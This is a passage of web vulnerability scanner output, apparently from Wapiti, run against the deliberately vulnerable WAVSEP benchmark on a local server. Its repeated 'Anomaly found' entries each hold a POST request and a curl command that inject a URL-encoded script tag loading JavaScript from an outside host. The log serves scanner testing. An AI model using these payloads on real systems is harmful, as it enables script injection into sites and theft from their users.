target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrcijmdolnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrcijmdolnz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwft4h9naztz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwft4h9naztz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8rdvt58s3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8rdvt58s3z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtmvpizphjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtmvpizphjz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5otmtvdxlz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5otmtvdxlz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnhu1sh2ozz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnhu1sh2ozz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwapdkevk6qz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwapdkevk6qz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfyojg7wubz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfyojg7wubz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws79gcizw5z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws79gcizw5z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcyk201713z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcyk201713z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn4j91onkjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn4j91onkjz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgw48msz4tz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgw48msz4tz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwl4db3dpgqz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwl4db3dpgqz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj33jb7j3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj33jb7j3z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb5j8jx7cwz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb5j8jx7cwz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfjg8tf8imz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfjg8tf8imz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwefu7gr73iz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwefu7gr73iz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsy577rkllz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsy577rkllz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp22o8wba6z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp22o8wba6z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj3jzs1r8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj3jzs1r8z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ymbjy8iwz.js%3E%3C%2Fscript%3E
